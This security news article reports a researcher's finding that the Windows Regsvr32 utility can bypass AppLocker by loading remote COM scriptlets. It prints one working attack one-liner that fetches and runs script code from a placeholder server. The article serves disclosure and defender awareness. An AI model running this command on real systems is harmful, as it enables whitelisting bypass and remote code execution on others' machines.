Microsoft Windows Applocker circumvented by exploiting native OS utility to remote execute code

The native Windows command-line utility Regsvr32 can be exploited to bypass MS Applocker and run remote code bypassing protection mechanisms.

A security researcher recently discovered a vulnerability that may very well reap chaos in the Windows world, it can be used to bypass whitelisting protections such as Microsoft’s AppLocker.

The Microsoft digitally-signed binary is a utility called Regsvr32 and it is a native command-line utility used to register DLLs (dynamic link library) and typically spawned when installing applications or software on a Windows system.

Once the DLLs have been registered, the data and code that is contained in the DLLs can be shared across one, two or many applications at the same time; however, a proof-of-concept conducted by the security researcher proved that the call to the DLL combined with COM

Scripplets (also known as .SCT files, more details at Inside COM+)  is not limited to local access.  In fact, it allowed the security researcher to execute JavaScript or VBScript code that it sourced from remote DLL located anywhere on the internet. While exploiting this vulnerability only requires minimal privileges, it makes the threat actor’s malicious job easy and seamless.

Once inside the network, the threat actor is able to run malicious code residing anywhere on the internet.  Moreover, the Regsvr32 command-line utility is proxy and SSL aware and therefore a perfect and easy native tool to abuse.

“I have been researching fileless persistence mechanisms.  And it led me to a dark place.  I would wish on no mortal.  COM+.”  said the security researcher “subTee” “I found a reference that stated that the [COM+] code in the registration element executes on register and unregister.” Intrigued yet restricted by the dilemma to execute the code by registering the DLL as a privileged user i.e. Administrator or a user with elevated privileges, “subTee” decided to take a different approach. “I logged in as a normal user and right clicked the .sct file and chose “unregister” and… It worked!”  

Here is an example of execution call:

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

It is unclear if this “feature” in the Regsvr32 command-line utility is by design or design flaw since there is not much information being documented about the utility on Microsoft MSDN page. However, irrespective of its use, it is clear that it can be used as an exploitation vehicle.

From the perspective of incident response and digital forensics, unless the analyst knows exactly what to look for, detection of this sort of attack vector is very difficult to identify as there are virtually no artifacts or remains to be found once the command has been executed.

To date, Microsoft has yet to comment or acknowledge this vulnerability and it is unclear when Microsoft will issue a patch, if any, after having subTee privately disclosing it to Microsoft on Tuesday 19^th of April 2016.

The proof-of-concept code is available on the GitHub repository.

Written by: Rami Shaath

Author Bio: Rami Shaath is a seasoned, accomplished professional with diverse background and talents spanning in technical, service delivery, and business-development disciplines in various roles and project lead across North America, Europe and the UAE.  With SANS, and ISC^2 certifications underway, his hunger to learn and advance is limitless.  A hardware tweaker, and open source enthusiast, Rami’s determination and perseverance is setting him on the long path to join the ranks of renowned leading experts in cyber security. 

[adrotate banner=”9″]

Edited by Pierluigi Paganini

(Security Affairs – Applocker, Microsoft)